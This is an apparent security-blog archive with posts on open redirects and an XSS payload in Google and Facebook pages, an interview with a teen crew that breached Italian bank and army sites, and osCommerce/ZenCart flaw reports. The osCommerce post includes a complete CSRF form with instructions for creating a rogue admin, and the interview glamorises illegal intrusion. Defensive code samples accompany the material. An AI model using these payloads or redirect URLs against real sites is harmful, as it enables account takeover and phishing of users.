Tag Archives: vulnerability

Open Redirect and XSS vulnerabilities for Google and FaceBook

January 26, 2012

0 Comments


Several vulnerabilities have recently been identified in pages of Google services and Facebook. Open Redirect flaws allow a redirect to be performed without having to manipulate strings or carry out any particular action.

"Open", in fact, indicates that the site affected by this flaw exercises no control over the input and always performs the redirect as requested. The appeal of this vulnerability lies in being able to use URLs on domains whose origin people do not question (Google, precisely) to make them click and redirect them to phishing sites or the like.

Imagine the average user who receives a cloned email from Google inviting him to click a URL on the "google.com" domain and enter his data for some plausible reason. How many would think that URL hides a threat?

In this case the URL affected by this vulnerability belongs to the Google Accounts service and is as follows:

https://accounts.google.com/o/oauth2/auth?redirect_uri=http://www.sitomalevolo.com

At present the flaw has been fixed, and trying to redirect to capn3m0.org you get a "Bad Request" error:

https://accounts.google.com/o/oauth2/auth?redirect_uri=www.capn3m0.org


This vulnerability was discovered by Ucha Gobejishvili aka longrifle0x, who only last week reported a series of XSS on well-known sites: Google, Apple, Sony Ericsson.

longrifle0x also identified an XSS vulnerability in the Google Apps for Business page. To test the vulnerability, go to the URL:

https://www.google.com/a/cpanel/premier/new3?hl=en

and enter the following code into the "Domain" field:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>


Here is his "curriculum"!

The second vulnerability, discovered by the ZeRtOx group's Devitel, concerns Facebook and is again an Open Redirect. The code is as follows:

and it is currently still present, as shown by this link, which redirects to capn3m0.org:

http://www.facebook.com/l.php?h=5AQH8ROsPAQEOTSTw7sgoW1LhviRUBr6iFCcj4C8YmUcC8A&u=www.capn3m0.org

Finally, I report a third vulnerability, again an Open Redirect, in a Google service: Ad Services. AdSense banners are associated with a URL built as follows:

http://www.googleadservices.com/pagead/aclk?
sa=L
&num=1
&cid=5GhoQFqmzEdFESSc_Vjf5Gxi
&sig=AOD64_2aoaqhlTxnKAENG806XtTTXpAjFw
&client=ca-pub-XXXXXXXXXXXXXXXX
&adurl=http://www.sitomalevolo.com

All the parameters receiving input must be correct, except that the adurl field is instead filled with the link to which we want the user redirected.

As you can imagine, finding a link with all the correct data is very simple: just browse sites that display Google AdSense banners and copy the link.
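All three cases above (redirect_uri, the l.php u parameter and adurl) share one root cause: the value of a query parameter is used as the redirect target without any check. The example below is added here and is not code from the original article or from Google or Facebook; it contrasts that flawed pattern with a hardened version for a hypothetical site (own_host is an assumed parameter, and the query strings are constructed samples).

```python
from typing import Optional
from urllib.parse import parse_qs, urljoin, urlparse

SAFE_DEFAULT = "/"  # where the user lands when the requested target is rejected


def vulnerable_redirect_target(query: str, param: str) -> Optional[str]:
    """The open-redirect pattern: the parameter value is used as the Location
    header without any check, so an attacker-chosen absolute URL is honoured."""
    values = parse_qs(query).get(param)
    return values[0] if values else None


def safe_redirect_target(query: str, param: str, *, own_host: str) -> str:
    """Hardened version: resolve the value against the site's own origin and
    only honour http(s) targets whose host is the site itself."""
    candidate = vulnerable_redirect_target(query, param)
    if not candidate:
        return SAFE_DEFAULT
    # urljoin turns a relative path into a same-host URL, a scheme-less host
    # ("www.sitomalevolo.com") into a harmless local path, and a protocol-relative
    # value ("//www.sitomalevolo.com") into an absolute URL we can inspect.
    resolved = urlparse(urljoin(f"https://{own_host}/", candidate.strip()))
    if resolved.scheme not in ("http", "https"):
        return SAFE_DEFAULT  # rejects javascript:, data:, etc.
    if resolved.hostname != own_host.lower():
        return SAFE_DEFAULT  # rejects every foreign host, however it was spelled
    return resolved.geturl()


if __name__ == "__main__":
    # Constructed query strings modelled on the three parameters discussed above.
    samples = [
        ("redirect_uri=http://www.sitomalevolo.com", "redirect_uri"),
        ("h=TOKEN&u=www.sitomalevolo.com", "u"),
        ("sa=L&num=1&client=ca-pub-XXXXXXXXXXXXXXXX&adurl=http://www.sitomalevolo.com", "adurl"),
    ]
    for query, param in samples:
        print(f"{param}: vulnerable -> {vulnerable_redirect_target(query, param)!r}, "
              f"safe -> {safe_redirect_target(query, param, own_host='www.example.com')!r}")
```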

For this last flaw I took inspiration from the previous two while writing this article. If you know of someone who reported it before me, let me know and I will credit the author.


Interview: 10 questions to pr0_alpha_team (aka Alpha_Team)

January 10, 2012

0 Comments

The staff of capn3m0.org had the opportunity to interview pr0_alpha_team, an emerging crew that has made itself noticed in recent days by breaching a number of institutional sites: from the sites of small municipalities to the site of Banca delle Marche, the Defence store site, esercito.it and many others.

As the poster image I chose the one from the 1995 film Hackers, whose protagonists were a crew of young guys who, partly for fun and partly out of passion, carried out attacks that disrupted a major city and ended up in the crosshairs of the FBI. The film, as we know, is fiction, but it inspired many kids like me who dreamed of becoming criminals or something of the sort.

The motto of the film was:

Their only crime was curiosity

Getting to know the boys of pr0_alpha_team a little better, it came back to mind, and you will see why.

Q #1 - How did pr0_alpha_team come about? Was it something between friends, like "let's see how far we can get", or structured and organized?

Alpha_Team began as a group of boys (virtual friends) who challenge the infrastructures that today should be the safest, trying to draw the attention of our beloved Italians to how vulnerable their systems are and how private data can fall into the hands of ordinary people.

Q #2 - Where does the name pr0_alpha_team come from? Are you an "alpha" version, so still unofficial? What can we expect?

The name Alpha_Team comes from the little imagination we had when we registered on Zone-H. What should you expect? Well, I hope for us that we keep having fun looking for vulnerabilities.

Q #3 - Looking at your profile on Zone-H, one has heard of you since November. Are you an "emerging" crew, or one formed some time ago that only now wants to publish its actions?

Previously we operated as individuals, but then one day we decided to unite, become Alpha_Team and disclose our actions.

Q #4 - Your background? Are you "ethical hackers" by profession?

We are all high school students; in the future we surely want to work in that field. We do not call ourselves hackers, only enthusiasts.

Q #5 - Independent or part of a larger project?

We are an independent group.

Q #6 - Why corporate websites? What message do you want to send?

We attack important sites for fun and to make clear to our dear webmasters how easy it is to exploit their weaknesses. For example, with the attack on Banca delle Marche we wanted the webmaster to understand how easy it was for us to obtain sensitive information.

Q #7 - So far the illustrious victims have been breached through SQL injection attacks. Is it the technique you prefer, or is it simply the one to which, as we have seen, all the victims were vulnerable?

Because in those sites we found that kind of vulnerability.

Q #8 - The silence of the press. The newspapers always go missing when the attack is not signed by Anonymous, which "draws an audience". What do you think of this dis-information?

We think that today there is no dis-information, but little desire among people using the internet to get informed. Everyone should know what risks they face while surfing the internet.

Q #9 - The term hacker is still used incorrectly, and no distinction is ever made between ethical, white hat, black hat, etc. What do you call yourselves?

We're just young computer enthusiasts.

Q #10 - The site of a bank, the site of the Defence store... your actions have once again highlighted the technical shortcomings in computer security. In Italy spending money on prevention is still a "bad habit" (unfortunately). If your victims were informed of the breach, how did they react? Have the holes been fixed since?

They reacted badly. As we can see in the case of Banca delle Marche, we are dealing with a paid CMS, and I do not think they paid very little. No, the holes are still there as before.

To conclude, this interview once again reveals the lack of attention our country pays to computer security, to our data and to the infrastructure of its most important or critical services. These guys, as I said quoting the film "Hackers", are just enthusiasts and curious. They have the means and the skills, and they are showing that, united, they can reach important targets such as the site of a bank or of the Army. They are not tied to any "famous" group, and therefore few people talk about pr0_alpha_team, but, as they themselves said, they want to make their actions known.

On the subject of disinformation they are right when they say that nowadays, with the internet available to anyone, it is hard to believe that people are badly informed or not informed at all. At least the journalists paid to "inform" could try to make the extra effort that we do not always have the time or the means to make.

Finally, regarding the attack on the site of Banca delle Marche (bancadellemarche.it), they tell us that, despite the money spent on a CMS that turned out to be vulnerable (it can happen, no one doubts there may be bugs), the flaw has still not been fixed. This is the kind of news that should give everyone pause. How can a bank, after discovering a breach of its data, not make headlines and not remedy it even in the short term?

To err is human, but to persevere is diabolical.


[EXPLOIT] - Multiple Vulnerabilities osCommerce v3.0a5

May 20, 2011

0 Comments

Following in the wake of the recent news that uncovered serious vulnerabilities in the latest versions of osCommerce (2.3.1) and ZenCart (1.3.9h), the latest alpha release of osCommerce, 3.0a5, could not miss the call either.

It is a really bad time for the osCommerce developers: in less than a month all the currently "stable" versions have been pierced by multiple vulnerabilities. In this specific release, which we repeat is an alpha, XSS, Full Path Disclosure, Local File Inclusion and XSRF vulnerabilities have been identified.

The Full Path Disclosure consists in requesting some osCommerce template files that fail, displaying on screen the full path of their location on the server. With this information alone you can do little, but in this case too, combined with other types of attack, it becomes useful information. The XSS allows JavaScript code to be injected by exploiting a flaw in the file "products.php", while the Local File Inclusion allows files on the server to be retrieved through the module uninstall function, since the CMS does not adequately verify the parameters passed and accepts any reachable path as input.

Again, there is one flaw more serious than the others, and I believe it is the XSRF, which allows commands to be sent to the application without them being verified in any way. In this case you can create a new Admin on the osCommerce installation.

Simply create an ".html" page containing the following code:

<html>
<body>
<form action="http://<sito vittima>/admin/index.php?Administrators&action=save" method="post">
<input type="text" name="user_name" value="<username>">
<input type="text" name="user_password" value="<password>">
<input type="text" name="modules[]" value="0">
<input type="hidden" name="subaction" value="confirm"/>
<input type="submit" value="Save">
</form>
</body>
</html>

Obviously you need to replace the following placeholders:

<sito vittima> with the domain of the site on which you want to create the account

<username> with the username of the new Admin

<password> with the password to associate with the new Admin

Once created, open the page in your browser and click "Save".

If everything went well, by accessing the URL:

http://<sito vittima>/admin/

you can log in as Admin with the data just entered.
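What makes the form above work is that the "save" action trusts the admin's session cookie alone, so the browser attaches it even when the POST comes from a page elsewhere. The example below is added here and is not code from the original advisory or from osCommerce; it models that handler for a hypothetical application (the session store, field names and the csrf_token field are assumptions) and shows the same action guarded by an Origin check and a per-session token.

```python
import hmac
import secrets
from typing import Dict, Optional

# Constructed stand-in for the server-side session store (hypothetical; the real
# CMS has its own). Maps a session id to that session's data.
SESSIONS: Dict[str, Dict[str, str]] = {}


def new_session() -> str:
    """Log an admin in: create a session that carries a random per-session token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """Token the legitimate admin form embeds as a hidden field."""
    return SESSIONS[sid]["csrf_token"]


def _form_is_complete(form: Dict[str, str]) -> bool:
    return bool(form.get("user_name")) and bool(form.get("user_password")) \
        and form.get("subaction") == "confirm"


def save_admin_vulnerable(sid: str, form: Dict[str, str]) -> bool:
    """The flawed pattern: a valid admin session plus the expected fields is
    enough, so a form submitted from an attacker's page also succeeds."""
    return sid in SESSIONS and _form_is_complete(form)


def save_admin_hardened(sid: str, form: Dict[str, str],
                        origin: Optional[str], own_origin: str) -> bool:
    """Same action with two independent checks: when the browser sends an Origin
    header it must be the site itself, and the form must carry the session's
    token, compared in constant time."""
    if sid not in SESSIONS:
        return False
    if origin is not None and origin != own_origin:
        return False
    expected = SESSIONS[sid]["csrf_token"].encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(expected, supplied):
        return False
    return _form_is_complete(form)
```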

For detailed information please refer to the advisory by Dr. Alberto Fontanella, its original author:

osCommerce v3.0a5 [Multiple Vulnerabilities]


[EXPLOIT] - ZenCart 1.3.9h Multiple Vulnerabilities

May 20, 2011

0 Comments

It is by now customary that, after the discovery of a new flaw in osCommerce, the same (or almost the same) holes are identified in chain for ZenCart, another well-known CMS derived from osCommerce itself.

The vulnerable version is the latest available, i.e. 1.3.9h, and it presents various types of vulnerabilities: Full Path Disclosure, Reflected XSS, Stored XSS and Arbitrary File Upload.

The Full Path Disclosure vulnerability allows, if error handling is configured to display errors, the absolute path of the application to be learned. In itself it is not a flaw that allows any kind of action, but the information obtained may be useful when combined with attacks that write to the filesystem or similar. The two XSS, moreover, do not affect only the current 1.3.9h but all previous versions as well. The vulnerabilities are located in the "Quantity" field of the cart, which allows code injection, and in the Administrative Area "Locations / Taxes". For the latter, therefore, it is assumed that you already have Admin access.

The last vulnerability, the most serious, concerns the Banner component (banner_manager.php) which, as in osCommerce, allows files to be uploaded that are saved in the "images" folder.

For detailed information please refer to the advisory by Dr. Alberto Fontanella, its original author:

Zen Cart <= v.1.3.9h [Multiple Vulnerabilities]


[EXPLOIT] - 2.3.1 Remote File Upload Vulnerability OsCommerce

May 19, 2011

0 Comments

As you may recall, the last time osCommerce was mentioned on this site it was to report a serious vulnerability affecting all versions. The flaw was present in different versions of osCommerce and of ZenCart, which is derived from it.

After 2 years of inactivity the programmers have released 2 new versions: 2.3.1 and 3.0.1. The release of the two new versions did not get much prominence, and few users of this application have updated.

On May 14, however, a new flaw was discovered (unfortunately very similar to the previous one) that allows files to be uploaded into the "/images" folder without using special techniques or stealing administrator credentials.

[...]
